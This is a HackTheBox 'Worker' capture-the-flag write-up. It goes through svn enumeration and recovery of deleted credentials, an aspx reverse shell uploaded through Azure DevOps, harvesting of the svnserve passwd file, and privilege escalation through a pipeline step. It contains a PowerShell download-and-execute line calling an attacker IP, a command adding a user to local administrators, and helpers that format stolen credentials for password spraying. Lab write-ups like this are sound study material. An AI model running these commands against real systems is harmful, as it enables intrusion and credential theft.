
HackTheBox-Worker

Box: Worker
Difficulty: Medium?

0x01 Information Gathering

nmap

nmap -p 80,3690,5985 -sV --script=vuln worker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-17 08:21 UTC
Nmap scan report for worker.htb (10.129.50.115)
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open svnserve Subversion
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1056.00 seconds

svn

Install svn:

sudo apt install subversion

Check out the server's repository to a local directory. It works straight away without any credentials: the svnserve instance allows anonymous read access.

svn checkout svn://10.129.2.29


We get one directory and one txt file.


The current revision is 5:

Checked out revision 5.


This reveals two subdomains of the target, and the note says the repository has been migrated to devops.worker.htb:

  • dimension.worker.htb
  • devops.worker.htb

Dig through the history. Revision 5 is only the latest state; files deleted in a later commit are still present in earlier revisions. A reverse merge back to an older revision brings them back into the working copy:


svn merge -r 5:3 svn://worker.htb


Roll back a bit further:

svn merge -r 5:2 svn://worker.htb
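The reverse merges above recover the deleted files, but they walk the history by hand. Below is an added example (not code from the original writeup) of automating the same hunt: it parses `svn log --xml -v` output to find revisions that modified or deleted files, then scans a unified `svn diff` for credential-looking lines that were removed, which is exactly the kind of secret that is gone from the latest revision but still sits in history. The log XML and the diff embedded here are constructed samples so the script runs offline; against the real server you would feed it `svn log --xml -v svn://worker.htb` and `svn diff -r N-1:N svn://worker.htb` for each flagged revision N.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of `svn log --xml -v` output. It is NOT the Worker repository's
# history; authors, paths and messages are made up so the script runs offline.
SAMPLE_LOG_XML = """<log>
<logentry revision="3">
<author>dev</author>
<date>2020-06-20T13:52:00.000000Z</date>
<paths>
<path kind="file" action="M">/tools/publish.ps1</path>
</paths>
<msg>Stop hardcoding the deployment password</msg>
</logentry>
<logentry revision="2">
<author>dev</author>
<date>2020-06-20T13:50:00.000000Z</date>
<paths>
<path kind="file" action="A">/tools/publish.ps1</path>
</paths>
<msg>Add deployment script</msg>
</logentry>
<logentry revision="1">
<author>dev</author>
<date>2020-06-20T13:40:00.000000Z</date>
<paths>
<path kind="dir" action="A">/tools</path>
</paths>
<msg>Initial import</msg>
</logentry>
</log>
"""

# Constructed sample of `svn diff -r 2:3` for the commit above (also made up).
SAMPLE_DIFF = """Index: tools/publish.ps1
===================================================================
--- tools/publish.ps1   (revision 2)
+++ tools/publish.ps1   (revision 3)
@@ -1,3 +1,3 @@
 $user = "svc_publish"
-$password = "Winter2020!"
+$password = Read-Host -AsSecureString "Password"
 Write-Host "Publishing as $user"
"""

# Credential-looking assignments: key = "value" / key: value, quoted or not.
SECRET_RE = re.compile(
    r'(pass(?:word)?|pwd|secret|token|api[_-]?key)\s*[=:]\s*["\']?([^"\'\s]+)', re.I)


def parse_log(xml_text):
    """Parse `svn log --xml -v` output into dicts sorted by revision (oldest first)."""
    entries = []
    for entry in ET.fromstring(xml_text).findall("logentry"):
        entries.append({
            "revision": int(entry.get("revision")),
            "author": (entry.findtext("author") or "").strip(),
            "msg": (entry.findtext("msg") or "").strip(),
            # (action, path): action is A (added), M (modified), D (deleted), R (replaced)
            "paths": [(p.get("action"), p.text) for p in entry.findall("paths/path")],
        })
    return sorted(entries, key=lambda e: e["revision"])


def interesting_revisions(entries):
    """Revisions that modify, replace or delete a file: where a secret may have been scrubbed."""
    return [e["revision"] for e in entries
            if any(action in ("M", "D", "R") for action, _ in e["paths"])]


def removed_secrets(diff_text):
    """Return (key, value) pairs for credential-looking lines that a diff REMOVED.

    Only '-' lines are scanned: the value is gone from HEAD but still in history."""
    hits = []
    for line in diff_text.splitlines():
        if line.startswith("-") and not line.startswith("---"):
            m = SECRET_RE.search(line[1:])
            if m:
                hits.append((m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG_XML)
    for e in log:
        print(f"r{e['revision']} {e['author']}: {e['msg']} {e['paths']}")
    # Against a live server, for each N in interesting_revisions(log) run
    #   svn diff -r N-1:N svn://worker.htb   (or svn cat -r N-1 <path> to dump the old file)
    print("revisions worth diffing:", interesting_revisions(log))
    print("secrets removed in r2:3:", removed_secrets(SAMPLE_DIFF))
```

The same pass also catches files that were deleted outright (action D), which is the case the two reverse merges above deal with; for those, `svn cat -r N-1` of the path gives the old content without touching the working copy.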


Use the credentials recovered this way to log in to devops.


Opening the project shows a source-code repository. Together with the two txt files from the svn checkout, this looks like the new project repository, so add its hostname to the hosts file and have a look:

spectral.worker.htb


Click upload file and upload an aspx reverse shell.


You have to create a new branch and then merge it (there is no permission to push directly to the main branch).


Approve the pull request manually; after that it can be merged.


Got the reverse shell back. It looks like Rotten Potato might work? But in my testing the download commands couldn't fetch anything either.


Looking up the svnserve service configuration shows that the repositories live on a separate mounted drive.


Under it there is a passwd file with many users' passwords.
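The svnserve.conf next to that passwd file is also what allowed the anonymous checkout at the start of the box. As an added example (not code from the original writeup), here is a small audit script: it flags the two weak settings in an svnserve.conf (anon-access other than none, and a plaintext password-db) and turns the passwd file into user:password lines ready for spraying against devops or WinRM. Both input files below are constructed samples in the layout svnserve uses; the users and passwords are made up.

```python
import configparser

# Constructed svnserve.conf and passwd files in the layout svnserve uses.
# These are NOT the files from the box; users and passwords are made up.
SAMPLE_SVNSERVE_CONF = """[general]
anon-access = read
auth-access = write
password-db = passwd
realm = Internal Repositories
"""

SAMPLE_PASSWD = """[users]
alice = Summer2020!
bob = bob123
"""


def load_ini(text):
    """svnserve.conf and passwd are INI files. Keep key case (usernames are
    case-sensitive) and disable %-interpolation so passwords containing '%' survive."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_svnserve(conf_text):
    """Return findings for an svnserve.conf; an empty list means nothing to flag."""
    cp = load_ini(conf_text)
    findings = []
    # svnserve's built-in default when the key is absent or commented out is "read",
    # which is why a fresh svnserve repo is readable by anyone who can reach port 3690.
    anon = cp.get("general", "anon-access", fallback="read").strip()
    if anon != "none":
        findings.append(f"anon-access = {anon}: anyone can svn checkout without credentials")
    if cp.get("general", "password-db", fallback="").strip():
        findings.append("password-db is set: user passwords are stored in plaintext in that file")
    return findings


def extract_users(passwd_text):
    """Map user -> plaintext password from an svnserve passwd file."""
    cp = load_ini(passwd_text)
    return dict(cp.items("users")) if cp.has_section("users") else {}


def spray_lines(users):
    """user:password lines for evil-winrm / crackmapexec style password spraying."""
    return [f"{u}:{p}" for u, p in users.items()]


if __name__ == "__main__":
    for finding in audit_svnserve(SAMPLE_SVNSERVE_CONF):
        print("[!]", finding)
    print("\n".join(spray_lines(extract_users(SAMPLE_PASSWD))))
```

The fix on the server side is `anon-access = none` plus either SASL/SSPI authentication or serving the repositories over HTTPS instead of the unencrypted svn:// protocol; the passwd file is always plaintext, so it should never be readable by anything but the svnserve account.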


Log in to devops again with one of the recovered users and you will find a different project there.


The default (hosted) pool has to be removed from the pipeline, otherwise the run fails; the job has to land on the project's own agent.

steps:
- script: echo This runs in the default shell on any machine
- bash: |
    echo This multiline script always runs in Bash.
    echo Even on Windows machines!
- pwsh: |
    Write-Host "This multiline script always runs in PowerShell Core."
    Write-Host "Even on non-Windows machines!"

Reading the docs, the script step runs in the agent machine's default shell (cmd.exe on a Windows agent), so add one of the following two commands:

net localgroup administrators robisl /add


powershell -c "Start-Process powershell {IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6:81/shell1.ps1')}"

Reverse shelling with PowerShell works, but the process gets killed by the console after a short while. Still, that is enough time to read root.txt or add robisl to administrators.
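A complete pipeline definition for this step, added here as an example and not taken from the original writeup. It assumes the self-hosted agent pool is named Setup (a placeholder: use whatever name the project's Agent pools page lists) and uses a single script step, which Azure Pipelines runs through cmd.exe on a Windows agent under the agent's service account; the command only succeeds because that account is privileged on the host.

```yaml
# Added example, not the pipeline from the original writeup.
# Pool name is an assumption: replace "Setup" with the self-hosted pool shown
# under Project Settings > Agent pools. Leaving the hosted pool in place is what
# makes the run fail, and the hosted agent is not the target machine anyway.
trigger: none

pool:
  name: Setup

steps:
- script: |
    whoami /all
    net localgroup administrators robisl /add
    net localgroup administrators
  displayName: Add robisl to local Administrators
```

The `whoami /all` line in the job log shows which account the agent service runs as and which privileges it holds; the last `net localgroup` call confirms the change before you reconnect with evil-winrm.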


Log in again with evil-winrm.
